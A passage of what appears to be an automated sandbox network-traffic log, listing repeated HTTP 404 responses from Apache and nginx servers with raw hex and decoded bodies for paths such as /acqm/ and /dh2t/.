6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:31 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:53:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:53:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:11 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:13 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:16 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:19 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 